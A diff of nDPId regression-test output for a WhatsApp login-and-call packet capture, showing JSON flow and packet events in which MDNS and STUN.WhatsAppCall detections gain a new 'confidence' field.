+00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":864,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"ts_msec":1432582285047,"pkt":"MzMAAAD7xiwDYGpkht1gAhHGAGwR\/\/6AAAAAAAAAxCwD\/\/5gamT\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsA5wAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADELAP\/\/mBqZMAMAAGAAQAAAHgABMCoAgHADAAcgAEAAAB4ABD+gAAAAAAAAMQsA\/\/+YGpk"}
-00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00700{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":865,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1432582285047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"ts_msec":1432582285047,"pkt":"MzMAAAD72DBiVgAcht1gA4nLAGwR\/\/6AAAAAAAAA2jBi\/\/5WABz\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsVWEAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADaMGL\/\/lYAHMAMAAGAAQAAAHgABKn+ps\/ADAAcgAEAAAB4ABD+gAAAAAAAANowYv\/+VgAc"}
-00673{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":866,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582285047,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1432582285062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582285062,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABInyUAAEARVS\/AqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1432582296337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACalSUAAEARuYTAqAIEHw1JMM46DZYAhue1AAMAaiESpEIAAPA16Ue1KOAmhBVAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1432582296337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaZm0AAEAR6DzAqAIEHw1JMM46DZYAhue1AAMAaiESpEIAAPA16Ue1KOAmhBVAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1432582296337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACajDIAAEARrnfAqAIEHw1dMM46DZYAhkaaAAMAaiESpEIAABQXleBLNAVxhWFAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1432582296337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACalgkAAEARpKDAqAIEHw1dMM46DZYAhkaaAAMAaiESpEIAABQXleBLNAVxhWFAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaRlMAAEARAcfAqAIEHw1PwM46DZYAhjlFAAMAaiESpEIAAL9\/1m08YXkuT0ZAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa1Y0AAEARcozAqAIEHw1PwM46DZYAhjlFAAMAaiESpEIAAL9\/1m08YXkuT0ZAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaIqQAAEARINbAqAIEszzAMM46DZYAhuAOAAMAaiESpEIAAHR4erx3E5L39hlAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaNRkAAEARDmHAqAIEszzAMM46DZYAhuAOAAMAaiESpEIAAHR4erx3E5L39hlAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa4C0AAEARtrvAqAIErfxyAc46DZYAhqERAAMAaiESpEIAAPckPngMfZVuqj1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaP+kAAEARVwDAqAIErfxyAc46DZYAhqERAAMAaiESpEIAAPckPngMfZVuqj1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaOAUAAEARBaXAqAIEHw1aMM46DZYAhuQ6AAMAaiESpEIAAEIAbV8qcywo32JAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaLOMAAEAREMfAqAIEHw1aMM46DZYAhuQ6AAMAaiESpEIAAEIAbV8qcywo32JAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
